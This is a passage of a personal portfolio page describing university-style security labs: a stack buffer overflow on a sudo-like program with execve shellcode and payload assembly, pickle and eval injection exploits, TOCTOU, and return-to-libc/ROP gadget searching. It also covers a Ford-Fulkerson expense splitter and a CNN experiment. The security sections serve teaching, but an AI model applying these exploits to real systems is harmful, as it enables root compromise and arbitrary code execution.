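password = b"A" * 10 + b"\x01"  # filler fills buffer[10..19]; the 11th byte
                                # overwrites auth's lowest byte with 1
print(len(password))            # 11 bytes
```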
<h3>Opening Bash</h3>
<h4>Crashing sudo</h4>
<p>
In order to open a bash shell we first need to understand how the program is laid out in memory. We do that by crashing it and generating a core dump,
which we can then open with GDB to see how the buffer is arranged.
<br>
The vulnerability here is again an unsafe use of strcat:
the password's length is never checked before it is passed to strcat, so a long password overflows the buffer.
Using this, we can input a long password that overwrites the return address (RA) and crashes the program.
We used an easily recognizable input so we could locate the RA by inspecting the stack pointer (ESP).
This caused a segmentation fault and generated a core dump.
</p>
<h4>Writing the shellcode</h4>
<p>
The core dump of a program is a “snapshot” of the program memory and
registers at the point in time right when it crashed. We can open it using GDB to find some important things.
<ul>
<li>Find where the buffer begins (let’s call this X)</li>
<li>Find at which offset from the beginning of the buffer, we have the
value we want to “update” (let’s call this offset Y)</li>
<li>Now, we know what we should do - create a buffer of size Y, beginning
with the shellcode, followed by padding (if needed) until we reach a
length of Y, and then finally add the address X.</li>
<li>Illustration of the process:
<br>
<img src="static/img/bof.JPG" alt="buffer overflow illustration" style="width: 100%; max-width: 300px;">
<br>
</li>
<li>Now, the final part is writing the shellcode. This was done here by making a syscall to execve</li>
</ul>
After crashing the program and creating a core file, we read it using GDB.
We crashed the program with an easy-to-identify input, so we could recognize our data in the registers and on the stack.
Using GDB we found the address of the beginning of the buffer (the address of the first byte of our input),
and the address the instruction pointer (EIP) held when the program crashed.
Subtracting those two values gives the offset from the beginning of the buffer to the return address (RA).
Inside this offset we place our shellcode, and into the RA we write the address of the beginning of the buffer.
A small NOP sled was also used, so that small inaccuracies in the address still land us inside the shellcode.
The shellcode was written in assembly. It was important that it contain no 0 bytes, otherwise strcat would stop copying and the RA would never be overwritten.
The shellcode is basically execve("/bin/sh", ["/bin/sh", NULL], [NULL]), since these are the arguments execve needs.
To produce the 0 (NULL) values we XORed a register with itself, so the shellcode itself contains no 0 bytes.
After the shellcode there was still some space left before the RA, so it was padded with NOPs.
<br>
The final password we entered was: nop_sled + shellcode + nop_padding + address_of_beginning_of_buffer.
With this we achieved root access.
</p>
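The payload construction can be sketched in Python. Every address and size here is hypothetical; in the real attack they are read out of the core dump with GDB, and the shellcode stand-in below is not real executable code:

```python
import struct

# Assembling the final "password" for the overflow.
buffer_start = 0xbffff6d0                  # address of buffer[0] (made up)
offset_to_ra = 64                          # buffer[0] -> saved return address
shellcode = b"\x31\xc0" + b"\x90" * 6      # stand-in for the real execve
                                           # shellcode (which has no 0 bytes)
nop_sled = b"\x90" * 8                     # absorbs small address inaccuracies
padding = b"\x90" * (offset_to_ra - len(nop_sled) - len(shellcode))
payload = nop_sled + shellcode + padding + struct.pack("<I", buffer_start)

assert b"\x00" not in payload              # strcat stops at the first NUL byte
print(len(payload))                        # 68 = offset_to_ra + 4
```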
<p>
<a href="https://github.com/nadavgover/Buffer-Overflow" target="_blank">View code</a> on GitHub.
</p>
</div>
</div>
<div id="logical-vulner" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Logical Vulnerabilities</h2>
<p>
Dealing with user input can be a difficult task. Especially when the user has malicious intentions.
In this project we have some examples of programs with user input that can be exploited. The common thread is that the writer of the
program expected the user to input x, but the user instead supplies y, thereby subverting the program.
</p>
<h3>Unsafe use of eval()</h3>
<p>
For example, a Python program that calls the eval function on user input. eval is very dangerous, because if we can inject a call such as os.system() into it we gain full
control of the program.
</p>
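A toy illustration of the problem (this calculator is made up, not the project's actual code):

```python
# Toy program that trusts eval() with raw user input. It expects an
# arithmetic expression, but nothing stops the user from supplying code.
def calculator(user_input: str):
    return eval(user_input)    # unsafe: evaluates arbitrary Python

print(calculator("2 + 3"))     # intended use: 5
# A malicious "expression" runs attacker-chosen code instead:
print(calculator("__import__('os').getcwd()"))
```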
<h3>Unsafe use of pickle.load() </h3>
<p>
Another example in this project is an unsafe use of Python's pickle module. pickle lets a class define how it is pickled via the __reduce__ method,
which returns a tuple of a callable and its arguments.
We can make the callable os.system and the argument a shell command such as echo hacked.
We put all of this inside a class and pickle an instance of it.
When the program unpickles it, the callable runs and we gain full control of the program.
</p>
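A minimal sketch of that attack, with a harmless echo as the payload:

```python
import os
import pickle

# __reduce__ returns (callable, args); unpickling calls callable(*args).
# The payload here is a harmless echo, but any shell command would work.
class Exploit:
    def __reduce__(self):
        return (os.system, ("echo hacked",))

payload = pickle.dumps(Exploit())
pickle.loads(payload)          # runs `echo hacked` during unpickling
```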
<h3>Bad parsing</h3>
<p>
Sometimes parsing the information from the user input can be done in a vulnerable manner. One such example can be found in the project.
</p>
<h3>Time of Check to Time of Use</h3>
<p>
Sometimes there is a gap between the moment user input is validated and the moment it is used. If we can swap the input data inside that window,
we pass the validation and then execute whatever we want.
You can see that in action in the project.
</p>
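A minimal single-process sketch of the check/use gap (a real exploit would race a separate privileged process; the file contents here are illustrative):

```python
import os
import tempfile

# The program checks a file, and only later uses it; anything can
# happen to the file inside that window.
path = tempfile.mktemp()
with open(path, "w") as f:
    f.write("safe contents")

# --- time of check: validation passes ---
assert os.access(path, os.R_OK)

# --- the race window: the attacker swaps the contents here ---
with open(path, "w") as f:
    f.write("malicious contents")

# --- time of use: the program consumes data it never validated ---
with open(path) as f:
    data = f.read()
print(data)                    # malicious contents
os.remove(path)
```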
<p>
<a href="https://github.com/nadavgover/Logical-Vulnerabilities" target="_blank">View code</a> and see all the examples on GitHub.
</p>
</div>
</div>
<div id="libc-rop" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Return to libc and Return Oriented Programming (ROP)</h2>
<h3>Background (and some history)</h3>
<p>
Most buffer overflow attacks rely on writing our code into the
stack and then hijacking the flow of the program to execute it. After this sort
of attack became popular, security measures were introduced to make it harder to
carry out.
During 2000-2005, many operating systems began implementing various
protections on the executable space, typically by marking the stack (and/or other
areas of memory) as non-executable. This prevented the classic buffer overflow
attack we exploited so far, and presented a new challenge for attackers.
In 1997, an attack called return-to-libc was published, describing a mechanism that
can obtain a shell in some cases even with a non-executable stack. This
technique is implemented in the first part of the project.
In 2007, a significantly more powerful version of this attack was published under the
name return oriented programming (ROP). It was presented at Black Hat 2008,
and enables executing far more sophisticated code than return-to-libc. This
technique is implemented in the second part of the project.
Our target in this project is the sudo program. It has a
non-executable stack, so a regular BOF attack won't work.
</p>
<h3>Inspecting libc memory with GDB</h3>
<p>
Before starting to implement return to libc, we’ll need to understand how to inspect
the memory of libc (the C standard library).
<br>
We can do this with GDB, specifically the <i>info files</i> command, looking for the
text section of libc. The important part is that
this section of memory is executable.
</p>
<h3>Gadget search engine</h3>
<p>
In the second part of the project we implement ROP attacks! However,
implementing ROP requires a working “gadget search engine” that can
scan memory and locate gadgets. Ours supports searching for the same instruction with multiple combinations of
registers at once, so that we don’t have to try all the combinations manually. For
example:
<br>
<br>
<img src="static/img/gadget_search_example.JPG" alt="gadget search example" style="width: 100%; max-width: 500px;">
<br>
<br>
Now we are ready to implement ROP.
</p>
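A toy version of such a search engine might look like this. The byte patterns are real x86 encodings, but the memory blob and the engine's interface are made up for illustration:

```python
# Scan a memory dump for short instruction sequences ending in ret (0xC3).
GADGETS = {
    b"\x58\xc3": "pop eax ; ret",
    b"\x5b\xc3": "pop ebx ; ret",
    b"\x59\xc3": "pop ecx ; ret",
    b"\x5a\xc3": "pop edx ; ret",
}

def find_gadgets(memory: bytes, base: int):
    """Return {address: disassembly} for every known gadget in the dump."""
    found = {}
    for pattern, asm in GADGETS.items():
        start = 0
        while (i := memory.find(pattern, start)) != -1:
            found[base + i] = asm
            start = i + 1
    return found

blob = b"\x90\x90\x58\xc3\x90\x5b\xc3"     # fake libc snippet
for addr, asm in find_gadgets(blob, 0xb7e00000).items():
    print(hex(addr), asm)
```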
<p>
<a href="https://github.com/nadavgover/Return-to-libc-and-ROP" target="_blank">View code</a> on GitHub.
</p>
</div>
</div>
<div id="splitwise" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Split Expenses With Ford-Fulkerson</h2>
<h3>Background</h3>
<p>
You are Dan. You live in an apartment with 3 roommates. Alice is paying the electricity bill, Bob is paying the water bill,
Carol is paying for the new lights on your balcony, and you just went and got groceries for dinner.<br>
The end of the month is here and you want everyone to pay equally so everything will be fair. Unfortunately, not everybody paid the same
amount, and it can be pretty annoying to calculate how much each person owes whom. Worry not! That is what this app is for! We will
split the expenses equally, and in a pretty cool way. (Settling the debts with the fewest payments is actually an NP-complete problem, so check out how it is done.)
</p>
<h3>How Do You Split the Expenses?</h3>
<p>
Great question. In the big picture, we build a graph where each node is a person and each edge is an amount to be paid or received. Then we apply the
Ford-Fulkerson algorithm to find the max flow, and the way the money flows through the graph tells everyone who pays whom.<br>
Ready to dive into the small picture? Here we go.<br>
So how exactly do we build the graph? Let's explain with an example. Assume Alice paid 50$, Bob paid 30$, Carol paid 15$ and Dan paid 5$.
To build the graph we need to:<br>
<ol>
<li>
Calculate the total amount paid.</br>
Amount = 50 + 30 + 15 + 5 = 100
</li>
</br>
<li>
Calculate how much money each person should have paid.</br>
DuePerPerson = Amount / #people = 100 / 4 = 25
</li>
</br>
<li>
Calculate the difference between the amount paid by each person and the DuePerPerson.</br>
diff(Alice) = 50 - 25 = 25</br>
diff(Bob) = 30 - 25 = 5</br>
diff(Carol) = 15 - 25 = -10</br>
diff(Dan) = 5 - 25 = -20</br>
</li>
</br>
<li>
Create a node in the graph for each person.
</li>
</br>
<li>
Create an edge with infinite capacity from each person to every other person in the graph.
</li>
</br>
<li>
For each diff calculated in stage 3: if the value is negative, the person paid less than their share and still owes money, so we add an inward
edge to that person with capacity equal to |diff| (the absolute value of diff). This represents an inward flow of money into the network. Otherwise,
we create an outward edge with capacity equal to diff, representing the outward flow of money from the graph. That way we make sure
each person pays or receives the right amount.
</li>
</br>
<li>
Applying the Ford-Fulkerson algorithm will result in multiple paths that represent the flow of money from one person to another,
which is equivalent to dividing the expenses equally between everybody.</br>
But (!), the Ford-Fulkerson algorithm works with one source node and one sink node, and here we may have more than one person who owes money
(multiple sources), and more than one person who needs to get money back (multiple sinks). In order to solve that we create one big source that connects
to all the small original sources (people who owe money), and similarly we create one big sink that connects to all other small sinks
(people who need to get money back).
</li>
</ol>
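The steps above can be sketched end-to-end in Python. This uses a minimal Edmonds-Karp max-flow (a BFS-based variant of Ford-Fulkerson) rather than the project's own implementation, with the amounts from the example:

```python
from collections import defaultdict, deque

# Steps 1-6: compute each person's diff and build the capacity graph.
paid = {"Alice": 50, "Bob": 30, "Carol": 15, "Dan": 5}
due = sum(paid.values()) / len(paid)               # 25 per person
diff = {p: amount - due for p, amount in paid.items()}

INF = float("inf")
cap = defaultdict(lambda: defaultdict(float))
for a in paid:                                     # person-to-person edges
    for b in paid:
        if a != b:
            cap[a][b] = INF
for p, d in diff.items():
    if d < 0:
        cap["SOURCE"][p] = -d                      # owes money: money flows in
    elif d > 0:
        cap[p]["SINK"] = d                         # is owed money: flows out

def max_flow(cap, s, t):
    flow = defaultdict(lambda: defaultdict(float))
    total = 0.0
    while True:
        parent = {s: None}                         # BFS for an augmenting path
        queue = deque([s])
        while queue and t not in parent:
            u = queue.popleft()
            for v in set(cap[u]) | set(flow[u]):
                if v not in parent and cap[u][v] - flow[u][v] > 0:
                    parent[v] = u
                    queue.append(v)
        if t not in parent:
            return total, flow
        bottleneck, v = INF, t                     # bottleneck along the path
        while parent[v] is not None:
            bottleneck = min(bottleneck, cap[parent[v]][v] - flow[parent[v]][v])
            v = parent[v]
        v = t                                      # push flow along the path
        while parent[v] is not None:
            flow[parent[v]][v] += bottleneck
            flow[v][parent[v]] -= bottleneck
            v = parent[v]
        total += bottleneck

total, flow = max_flow(cap, "SOURCE", "SINK")
print(total)                                       # 30.0: every debt settled
```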
And the results are pretty cool:
<br>
<br>
<img src="static/img/splitwise.png" alt="Split expenses with Ford-Fulkerson" style="width: 100%; max-width: 800px;">
<br>
<br>
Alice gets 15$ from Dan and 10$ from Carol, Bob gets 5$ from Dan.<br>
Nice!
</p>
<p>
<a href="https://github.com/nadavgover/Splitwise" target="_blank">View code</a> on GitHub.
</p>
</div>
</div>
<div id="cnn" class="lightbox-content-scroll lity-hide">
<div class="scrollable-content">
<h2>Image recognition with Convolutional Neural Network</h2>
<h3>Background</h3>
<p>
In this project we experiment with <a href="https://en.wikipedia.org/wiki/Convolutional_neural_network" target="_blank">Convolutional Neural Networks</a> (CNN) and different regularization methods.
A CNN is a type of network that performs well on images and object detection, so it is only natural that we deal with images.
And indeed, the dataset for this project is FashionMNIST, which consists of images of different articles of clothing.
Each image is a 28x28 grayscale image, associated with a label from 10 classes.
To get a feeling for the dataset we are working with, let's visualize it!
</br>
</br>
<img src="static/img/fashion_mnist.png" alt="fashion mnist" style="width: 100%; max-width: 400px;">
</br>
</br>
The different regularization methods that were put to the test are <a href="https://en.wikipedia.org/wiki/Dropout_(neural_networks)" target="_blank">dropout</a>,
<a href="https://en.wikipedia.org/wiki/Regularization_(mathematics)" target="_blank">weight decay</a> and
<a href="https://en.wikipedia.org/wiki/Batch_normalization" target="_blank">batch normalization</a>.
</p>
<h3>Dropout</h3>
<p>
Dropout is a regularization technique for training neural networks that randomly “drops out”
neurons during training in order to avoid overfitting.
</p>
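A minimal numpy sketch of (inverted) dropout at training time, not the project's actual code:

```python
import numpy as np

# Inverted dropout: zero each activation with probability p during training,
# and scale the survivors by 1/(1-p) so the expected value is unchanged.
def dropout(activations, p, training=True):
    if not training or p == 0.0:
        return activations
    mask = (np.random.rand(*activations.shape) >= p) / (1.0 - p)
    return activations * mask

x = np.ones((4, 8))
print(dropout(x, p=0.5).shape)   # (4, 8): same shape, ~half the entries zeroed
```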
<h3>Weight Decay</h3>
<p>
Weight decay adds a small penalty, proportional to the size of the weights, to the loss before each update.
This pushes the weights toward smaller values during training, which discourages overly complex
solutions and helps prevent overfitting.
</p>
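A short sketch of how weight decay shows up in a plain SGD update (the hyperparameter values are arbitrary):

```python
import numpy as np

# The L2 penalty on the loss turns into an extra shrinking term
# in the gradient update.
def sgd_step(w, grad, lr=0.1, weight_decay=1e-2):
    return w - lr * (grad + weight_decay * w)

w = np.array([10.0, -10.0])
print(sgd_step(w, grad=np.zeros(2)))   # [ 9.99 -9.99]: the weights shrink
                                       # even with zero data gradient
```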
<h3>Batch Normalization</h3>
<p>
We normally normalize our input data.
Batch normalization also normalizes the inputs of the hidden layers,
which gives a big improvement in training speed.
</p>
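A minimal numpy sketch of the normalization step (a real batch-norm layer would also keep running statistics for use at inference time):

```python
import numpy as np

# Normalize each feature over the batch, then apply the learned scale
# (gamma) and shift (beta).
def batch_norm(x, gamma=1.0, beta=0.0, eps=1e-5):
    mean = x.mean(axis=0)
    var = x.var(axis=0)
    x_hat = (x - mean) / np.sqrt(var + eps)
    return gamma * x_hat + beta

batch = np.random.randn(32, 16) * 5 + 3    # a batch far from zero mean/unit std
out = batch_norm(batch)
print(out.mean(axis=0).round(6).max())     # ~0.0 per feature after the layer
```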
<p>
Below is a cool graph showing the accuracy achieved with different learning rates while training the model for this project.
</br>
</br>
<img src="static/img/cnn.jpg" alt="different learning rates" style="width: 100%; max-width: 500px;">
</br>
</br>
</p>
<p>
<a href="https://github.com/nadavgover/Image-Rcognition/" target="_blank">View code</a> on GitHub.
</p>
</div>
</div>
</section>
<footer>
<div id="contact" class="socialbtns">
<ul>
<li>Contact me at:</li>
<li><a href="http://www.github.com/nadavgover" target="_blank"> <i class="fa fa-lg fa-github"></i></a></li>
<li><a href="https://www.instagram.com/nadavgover/" target="_blank"> <i class="fa fa-lg fa-instagram"></i></a></li>
<li><a href="mailto:nadavgover@gmail.com"><i class="fa fa-lg fa-envelope"></i></a></li>
</ul>
</div>
<span class=credits>
Code and design by Nadav Gover
<br>
Drawings by Brooke VanHest  
<a href="https://www.instagram.com/twovintagepaperdolls/" target="_blank"> <i class="fa fa-lg fa-instagram"></i></a>
 
<a href="https://twovintagepaperdolls.com/" target="_blank"> <i class="fa fa-lg fa-globe"></i></a>
</span>
</footer>
</body>
</html>